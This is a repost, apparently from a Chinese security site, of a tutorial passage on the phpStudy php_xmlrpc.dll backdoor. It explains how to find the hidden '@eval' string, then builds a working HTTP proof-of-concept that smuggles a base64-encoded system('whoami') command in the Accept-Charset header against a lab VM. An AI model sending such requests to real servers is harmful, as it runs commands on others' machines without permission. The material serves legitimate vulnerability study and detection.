DIY装机联盟-电脑故障排除|装机指南|硬件配置|电脑知识

DIY装机联盟-电脑故障排除|装机指南|硬件配置|电脑知识

http://www.jinanshengke.com

菜单导航

phpStudy远程RCE漏洞复现以及沦陷主机入侵溯源分析

作者: 庄吉 发布时间: 2020年09月02日 18:40:38

phpStudy远程RCE漏洞复现以及沦陷主机入侵溯源分析

前言:

各位FreeBuf观众的姥爷大家好,我是艾登——皮尔斯(玩看门狗时候注册的ID),最近安全圈好不热闹,北京时间9月20日“杭州公安”官微发布了“杭州警方通报打击涉网违法犯罪暨’净网2019′专项行动战果”推文,该“后门”无法被杀毒软件扫描删除,并且藏匿于软件某功能性代码中,极难被发现具有免杀性质。严重的威胁到了互联网的空间安全,让大量的互联网网名的个人隐私信息遭到存在大面积泄露的风险,这篇文章分为图文教程和视频教程(文章末尾)。

文章目录:

1.phpstudy后门检测

2.phpstudy远程RCE后门复现图文教程

3.phpstudy远程RCE后门复现教视频程

3.Python编写复现脚本

4.Python编写批量复现脚本

5.针对部署phpstudy环境服务器已沦陷的主机进行溯源分析/黑客入侵画像

6.修复建议

7.参考

准备工具:

VMware Workstation Pro

Windows7的/ 2008R2

BurpSuiteFree

phpStudy20161103.zip(文中使用)phpStudy20180211.zip

Python

一、phpstudy后门检测:

(1)phpStudy20161103 后门位置存在于:

*:phpStudyphpphp-5.2.17extphp_xmlrpc.dll

*:phpStudyphpphp-5.2.17extphp_xmlrpc.dll

(2)phpStudy20180211后门位置存在于:

*:PHPTutorialPHPPHP-5.2.17extphp_xmlrpc.dll

*:PHPTutorialPHPPHP-5.4.45extphp_xmlrpc.dll

phpStudy远程RCE漏洞复现以及沦陷主机入侵溯源分析

(3)找到“ php_xmlrpc,dll”后用记事本打开,“ Ctrl + F”搜索“ @eva ”字符串如果存在就存在后门:

phpStudy远程RCE漏洞复现以及沦陷主机入侵溯源分析

(4)Phpstudy后门分析文章传送门:

https://www.freebuf.com/news/topnews/214912.html

https://www.cppentry.com/bencandy.php?fid=85&id=261791

二、phpstudy远程RCE后门复现图文教程:

(1)虚拟机搭建好Phpstudy环境,我这里使用的是phpstudy2016版本

phpStudy远程RCE漏洞复现以及沦陷主机入侵溯源分析

Phpstudy环境192.168.1.91

(2)浏览器访问靶机地址:http//192.168.1.91/

phpStudy远程RCE漏洞复现以及沦陷主机入侵溯源分析

(3)浏览器设置本地代理并且打开BurpSuiteFree抓包

phpStudy远程RCE漏洞复现以及沦陷主机入侵溯源分析

(4)phpstudy RCE POC:

GET / HTTP/1.1

Host: 192.168.43.99

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64;x64; rv:69.0) Gecko/20100101 Firefox/69.0

Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip,deflate

Accept-Charset:”commandbase64 string”

Connection: close

Upgrade-Insecure-Requests: 1

Cache-Control: max-age=0

(5)CTRL + R把请求包转发到中继器模块

Accept-Charset:”command base64 string”中执行命令经过了的的Base64编码加密:

执行语句指令:system(‘whoami’);

BASE64 编码后:c3lzdGVtKCd3aG9hbWknKTs =

替换进去

Accept-Charset: c3lzdGVtKCd3aG9hbWknKTs=

还要把“ ”中的前面的空格删除。Accept-Encoding: gzip, deflatedeflate

(6)构造好执行语句为WHOAMI的POC如下:

GET / HTTP/1.1

Host: 192.168.1.91

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64;rv:69.0) Gecko/20100101 Firefox/69.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip,deflate

Accept-Charset: c3lzdGVtKCd3aG9hbWknKTs=

Connection: close

Upgrade-Insecure-Requests: 1

Cache-Control: max-age=0

本文地址:http://www.jinanshengke.com/wlzs/61490.html

请遵守互联网相关规定,不要发布广告和违法内容